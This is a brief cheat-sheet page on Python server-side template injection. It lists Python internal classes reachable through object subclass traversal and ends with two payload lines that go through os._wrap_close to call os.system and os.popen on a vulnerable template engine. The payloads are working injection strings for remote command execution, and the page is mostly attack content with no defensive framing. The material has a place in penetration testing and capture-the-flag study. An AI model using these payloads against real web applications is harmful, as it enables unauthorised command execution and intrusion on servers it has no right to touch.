Python SSTI, Exploitable Classes

       

    This document is continuously updated.

    Useful Classes

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    _frozen_importlib._ModuleLock
    _frozen_importlib._DummyModuleLock
    _frozen_importlib._ModuleLockManager
    _frozen_importlib._installed_safely
    _frozen_importlib.ModuleSpec
    _frozen_importlib_external.FileLoader
    _frozen_importlib_external._NamespacePath
    _frozen_importlib_external._NamespaceLoader
    _frozen_importlib_external.FileFinder
    codecs.IncrementalEncoder
    codecs.IncrementalDecoder
    codecs.StreamReaderWriter
    codecs.StreamRecoder
    os._wrap_close
    _sitebuiltins._Printer
    types.DynamicClassAttribute
    types._GeneratorWrapper
    warnings.WarningMessage
    warnings.catch_warnings
    contextlib._GeneratorContextManagerBase
    contextlib._BaseExitStack

    Using os._wrap_close

    1
    2
    [].__class__.__mro__[1].__subclasses__()[127].__init__.__globals__['system']('ls')
    [].__class__.__mro__[1].__subclasses__()[127].__init__.__globals__['popen']('ls').read()